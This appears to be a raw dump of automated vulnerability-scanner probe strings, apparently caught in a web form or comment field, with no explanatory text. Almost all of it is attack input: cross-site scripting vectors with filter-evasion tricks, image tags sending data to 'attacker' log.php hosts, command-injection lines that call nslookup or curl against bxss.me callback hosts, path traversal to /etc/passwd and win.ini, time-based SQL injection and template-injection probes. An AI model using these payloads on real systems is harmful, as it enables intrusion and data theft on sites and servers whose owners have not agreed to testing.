555<input autofocus onfocus=oOYF(9727)>

bfg5725\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5725

555<body onload=TIPw(9159)>

555<img src=xyz OnErRor=Pjcn(9370)>

555gnwhK <ScRiPt >Hqvp(9211)</ScRiPt>

555QLTya <ScRiPt >GVwd(9830)</ScRiPt>

555<ScR<ScRiPt>IpT>9n5T(9560)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>lLKj(9948)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >9n5T(9936)</ScRiPt>

555aCHJD <ScRiPt >dk4Z(9239)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9958></ScRiPt>

555<img/src=">" onerror=alert(9049)>

555<img/src=">" onerror=alert(9849)>

555<img src=//xss.bxss.me/t/dot.gif onload=TIPw(9920)>

<a HrEF=jaVaScRiPT:>

bfgx2276\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2276

555<WSHRYT>PWTS9[!+!]</WSHRYT>

bfg7743\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7743

555<ScRiPt >lLKj(9108)</ScRiPt>

555<WXC1TQ>OGNOX[!+!]</WXC1TQ>

555<WPXOCO>MSPFN[!+!]</WPXOCO>

555<WNSJ3F>6L86A[!+!]</WNSJ3F>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9758></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%33%47%34%289188%29%3C%2F%73%43%72%69%70%54%3E

bfgx1908\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1908

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9535></ScRiPt>

555<ScRiPt >oewW(9620)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%50%6A%63%6E%289951%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9030.com></IfRamE>

555}body{zzz:Expre/**/SSion(oOYF(9557))}

<%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=TIPw(9202)>

555<ifRAme sRc=9554.com></IfRamE>

555<ifRAme sRc=9022.com></IfRamE>

555<ScRiPt >9n5T(9854)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScRiPt >lLKj(9072)</ScRiPt>

555

555\u003CScRiPt\M3G4(9438)\u003C/sCripT\u003E

555<ifRAme sRc=9671.com></IfRamE>

555V1vOV <ScRiPt >oOYF(9299)</ScRiPt>

555<svg \xa0onload=lLKj(9324)

555<img/src=">" onerror=alert(9369)>

555<aZjIPKX x=9280>

555<aVCnVRE x=9881>

555<aODYmJb x=9400>

555<svg \xa0onload=9n5T(9611)

555<svg \xa0onload=oewW(9381)

555

555\u003CScRiPt\Pjcn(9108)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%49%50%77%289995%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9324/log.php?

555<WZIM6J>OWCZN[!+!]</WZIM6J>

555<avNNDSC x=9811>

555<isindex type=image src=1 onerror=lLKj(9065)>

555&lt

555<isindex type=image src=1 onerror=9n5T(9395)>

555&lt

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9353/log.php?

555<img sRc='http://attacker-9935/log.php?

555<ifRAme sRc=9211.com></IfRamE>

555<img sRc='http://attacker-9971/log.php?

555<isindex type=image src=1 onerror=oewW(9343)>

555

\xf6<img zzz onmouseover=M3G4(99891) //\xf6>

\xf6<img zzz onmouseover=Pjcn(90911) //\xf6>

555<aDDlBWN<

555\u003CScRiPt\TIPw(9629)\u003C/sCripT\u003E

555<iframe src='data:text/html

555

555<iframe src='data:text/html

555<aB4quU1<

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<input autofocus onfocus=Pjcn(9219)>

555&lt

555<azyI1ZD x=9262>

555<aZGxBkV<

555<aQlNEqa<

555<body onload=lLKj(9195)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >8zp8(9808)</ScRiPt>

1vNNR3k6O

555<img sRc='http://attacker-9358/log.php?

555'"()&%<zzz><ScRiPt >gzGB(9411)</ScRiPt>

555

\xf6<img zzz onmouseover=TIPw(91871) //\xf6>

echo zpbohj$()\ iencki\nz^xyu||a #' &echo zpbohj$()\ iencki\nz^xyu||a #|" &echo zpbohj$()\ iencki\nz^xyu||a #

555

555<img src=//xss.bxss.me/t/dot.gif onload=lLKj(9670)>

555<body onload=9n5T(9586)>

555<input autofocus onfocus=M3G4(9683)>

response.write(9533469*9104064)

555<body onload=oewW(9516)>

<a HrEF=http://xss.bxss.me></a>

&echo ghpfzw$()\ vnhiur\nz^xyu||a #' &echo ghpfzw$()\ vnhiur\nz^xyu||a #|" &echo ghpfzw$()\ vnhiur\nz^xyu||a #

'+response.write(9533469*9104064)+'

'"()&%<zzz><ScRiPt >8zp8(9144)</ScRiPt>

555

555&echo pooclx$()\ xhpqui\nz^xyu||a #' &echo pooclx$()\ xhpqui\nz^xyu||a #|" &echo pooclx$()\ xhpqui\nz^xyu||a #

555<input autofocus onfocus=TIPw(9704)>

"+response.write(9533469*9104064)+"

|echo szdzzw$()\ zogjwl\nz^xyu||a #' |echo szdzzw$()\ zogjwl\nz^xyu||a #|" |echo szdzzw$()\ zogjwl\nz^xyu||a #

G3RZEurH

555<img src=//xss.bxss.me/t/dot.gif onload=oewW(9463)>

'"()&%<zzz><ScRiPt >gzGB(9132)</ScRiPt>

555

555<aMUbi33<

<a HrEF=http://xss.bxss.me></a>

555

5559653947

555<img src=xyz OnErRor=lLKj(9401)>

../../../../../../../../../../../../../../etc/passwd

555|echo irtpir$()\ ofmlnz\nz^xyu||a #' |echo irtpir$()\ ofmlnz\nz^xyu||a #|" |echo irtpir$()\ ofmlnz\nz^xyu||a #

555

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555<img src=//xss.bxss.me/t/dot.gif onload=9n5T(9521)>

555

<a HrEF=http://xss.bxss.me></a>

555

(nslookup -q=cname hitwcsyjrplbmfe81c.bxss.me||curl hitwcsyjrplbmfe81c.bxss.me))

../../../../../../../../../../../../../../windows/win.ini

5559090663

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

12345'"\'\")

file:///etc/passwd

$(nslookup -q=cname hitvfnhbdmaff9ab60.bxss.me||curl hitvfnhbdmaff9ab60.bxss.me)

555

555<img src=xyz OnErRor=9n5T(9363)>

555<img/src=">" onerror=alert(9211)>

bfg5802\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5802

<a HrEF=jaVaScRiPT:>

555<esi:include src="http://bxss.me/rpb.png"/>

&nslookup -q=cname hitdpjkwgexxme42c9.bxss.me&'\"`0&nslookup -q=cname hitdpjkwgexxme42c9.bxss.me&`'

555

${9999733+9999928}

<a HrEF=jaVaScRiPT:>

555<img src=xyz OnErRor=oewW(9056)>

bfgx6202\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6202

555

bfg3422\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3422

555

555

555}body{zzz:Expre/**/SSion(Pjcn(9861))}

../555

&(nslookup -q=cname hitygmrjmyckld2b22.bxss.me||curl hitygmrjmyckld2b22.bxss.me)&'\"`0&(nslookup -q=cname hitygmrjmyckld2b22.bxss.me||curl hitygmrjmyckld2b22.bxss.me)&`'

555gwGkApIo

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

555

555}body{zzz:Expre/**/SSion(M3G4(9958))}

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

|(nslookup -q=cname hitxvdzpwnstk4f26f.bxss.me||curl hitxvdzpwnstk4f26f.bxss.me)

555

555<img/src=">" onerror=alert(9265)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%4C%4B%6A%289935%29%3C%2F%73%43%72%69%70%54%3E

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

555

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(TIPw(9837))}

555

555&n996649=v990381

`(nslookup -q=cname hitufvhhrkuljc1f39.bxss.me||curl hitufvhhrkuljc1f39.bxss.me)`

555x3b17 <ScRiPt >Pjcn(9369)</ScRiPt>

Http://bxss.me/t/fit.txt

555

555

555

555<img/src=">" onerror=alert(9993)>

555

bfgx6871\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6871

http://bxss.me/t/fit.txt?.jpg

)

555SZlf6 <ScRiPt >TIPw(9730)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%6E%35%54%289391%29%3C%2F%73%43%72%69%70%54%3E

/etc/shells

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555qmDHK <ScRiPt >M3G4(9611)</ScRiPt>

555

555<WPJRYI>AZBKC[!+!]</WPJRYI>

555

555

555\u003CScRiPt\lLKj(9416)\u003C/sCripT\u003E

dfb__${98991*97996}__::.x

!(()&&!|*|*|

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%65%77%57%289405%29%3C%2F%73%43%72%69%70%54%3E

c:/windows/win.ini

'.gethostbyname(lc('hitop'.'spijcynn4fea0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(85).chr(112).chr(69).'

555

555<WACTHS>TP6JZ[!+!]</WACTHS>

<th:t="${dfb}#foreach

-1 OR 2+904-904-1=0+0+0+1 --

555

^(#$!@#$)(()))******

bxss.me

".gethostbyname(lc("hitvt"."ccgvkrct0c4d1.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(65).chr(108).chr(85)."

555

555

555

555&lt

555\u003CScRiPt\oewW(9600)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

555<ScRiPt >9G0z(9950)</ScRiPt>

-1 OR 2+639-639-1=0+0+0+1

'

555

555

555

555

"

555<ifRAme sRc=9251.com></IfRamE>

555\u003CScRiPt\9n5T(9513)\u003C/sCripT\u003E

555

555<ifRAme sRc=9584.com></IfRamE>

555<W5KHAZ>TLLF4[!+!]</W5KHAZ>

-1' OR 2+338-338-1=0+0+0+1 --

555

555

'"()

555

555

555'&&sleep(27*1000)*fqvmwe&&'

HttP://bxss.me/t/xss.html?%00

555

555

${@print(md5(31337))}

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

-1' OR 2+649-649-1=0+0+0+1 or 'Zl110h5N'='

"+"A".concat(70-3).concat(22*4).concat(108).concat(71).concat(122).concat(74)+(require"socket" Socket.gethostbyname("hittp"+"eeyfolrw73f6c.bxss.me.")[3].to_s)+"

555"&&sleep(27*1000)*axflar&&"

555

-1" OR 2+365-365-1=0+0+0+1 --

555&lt

bxss.me/t/xss.html?%00

555

${@print(md5(31337))}\

555

'+'A'.concat(70-3).concat(22*4).concat(121).concat(75).concat(112).concat(88)+(require'socket' Socket.gethostbyname('hitfu'+'dotoaleieb6a8.bxss.me.')[3].to_s)+'

555'||sleep(27*1000)*acpmxf||'

555

555

555"||sleep(27*1000)*ffnouc||"

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<WCAPBJ>YMKG6[!+!]</WCAPBJ>

\xf6<img zzz onmouseover=lLKj(90101) //\xf6>

'.print(md5(31337)).'

555<aFLLtOk x=9422>

555

<th:t="${dfb}#foreach

555

555

555*if(now()=sysdate(),sleep(15),0)

555

555<ifRAme sRc=9884.com></IfRamE>

555&lt

555<aPPXNnk x=9349>

555

\xf6<img zzz onmouseover=oewW(96231) //\xf6>

555

555

comments

555<ScRiPt >jNoP(9599)</ScRiPt>

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

xfs.bxss.me

555

555

'"

comments

555<script>9G0z(9732)</script>

555

555

555

555

555

<!--

comments/.

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

555

555

555<W6AGOW>HHY7V[!+!]</W6AGOW>

555'"()&%<zzz><ScRiPt >X16q(9264)</ScRiPt>

555<ax6Egm4 x=9950>

555<input autofocus onfocus=oewW(9438)>

\xf6<img zzz onmouseover=9n5T(97211) //\xf6>

555<input autofocus onfocus=lLKj(9317)>

555<img sRc='http://attacker-9611/log.php?

555

555

555

555

555

555

dfb{{98991*97996}}xca

555<img sRc='http://attacker-9941/log.php?

'"()&%<zzz><ScRiPt >X16q(9716)</ScRiPt>

555

555

555

5559020273

555<script>jNoP(9573)</script>

555<img sRc='http://attacker-9151/log.php?

555

555

555<a7E31cl<

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

555<aznX3bB<

<a HrEF=http://xss.bxss.me></a>

555<script>9G0z(9705)</script>9705

555

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

555

555<input autofocus onfocus=9n5T(9815)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>